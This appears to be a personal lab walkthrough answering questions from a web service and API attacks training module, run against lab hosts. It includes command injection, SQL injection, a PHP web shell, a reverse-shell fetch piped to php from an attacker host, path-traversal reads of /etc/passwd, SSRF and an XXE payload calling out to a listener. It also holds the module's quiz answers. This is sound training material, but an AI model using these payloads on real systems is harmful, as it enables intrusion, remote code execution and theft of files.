Questions

Exploit the command injection vulnerability of the target to execute an "id" command. Submit the privileges under which the server is running as your answer. Answer options (without quotation marks): "user", "www-data", "root"

http://10.129.100.72:3003/ping-server.php/system/id
uid=0(root) gid=0(root) groups=0(root)

To execute commands featuring arguments via http://:3003/ping-server.php/system/{cmd} you may have to use ______. Answer options (without quotation marks): "Encryption", "Hashing", "URL Encoding"

URL encoding

What is the username of the third user (id=3)?

└─$ curl http://10.129.100.72:3003/?id=3
[{"id":"3","username":"WebServices","position":"3"}]

Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.

http://10.129.100.72:3003/?id=1%20or%201=1%20--%20true

Achieve remote code execution and submit the server's hostname as your answer.

upload shell.php
http://10.129.100.72:3001/uploads/shell.php?cmd=id
Shelluid=0(root) gid=0(root) groups=0(root) 
http://10.129.100.72:3001/uploads/shell.php?cmd=curl%20http://10.10.14.15/php-reverse-shell.php|php

LFI 

ffuf -w "SecLists-master/Discovery/Web-Content/common-api-endpoints-mazen160.txt" -u 'http://10.129.100.72:3000/api/FUZZ'

[Status: 200, Size: 71, Words: 5, Lines: 1, Duration: 295ms]
    * FUZZ: download

http://10.129.100.72:3000/api/download

curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fhosts"
curl "http://10.129.100.72:3000/api/download/..%2f..%2f..%2f..%2fetc%2fpasswd"

Through the LFI vulnerability identify an existing user on the server whose name starts with "ub". Answer format: ub****

ubuntu

SSRF:

Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No

curl http://10.129.202.133:3000/api/userinfo
curl "http://10.129.100.72:3000/api/userinfo?id=http://127.0.0.1:3002"

XXE Injection via API calls

POST /api/login/ HTTP/1.1
Host: 10.129.100.72:3001
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 175
Origin: http://10.129.100.72:3001
Connection: close
Referer: http://10.129.100.72:3001/

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pwn [<!ENTITY somename SYSTEM "http://10.10.14.15:8000"> ]>
<root><email>&somename;</email><password>admin</password></root>

nc -nlvp 8000
listening on [any] 8000 ...
connect to [10.10.14.15] from (UNKNOWN) [10.129.100.72] 60398
GET / HTTP/1.0
Host: 10.10.14.15:8000
Connection: close
PreviousWeb Service and API attacksNextNotes

Last updated